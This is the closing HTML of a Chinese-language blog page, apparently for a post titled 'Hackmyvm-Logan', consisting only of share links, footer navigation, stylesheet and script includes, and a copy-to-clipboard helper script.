  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/&title=Hackmyvm-Logan"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/&title=Hackmyvm-Logan"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/&title=Hackmyvm-Logan"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/&name=Hackmyvm-Logan&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/&t=Hackmyvm-Logan"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2026
    jxdgx
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/links/">links</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


<link rel="stylesheet" href="/css/custom.css">

    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<script src="/js/custom.js"></script>
<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->


</body>
</html>
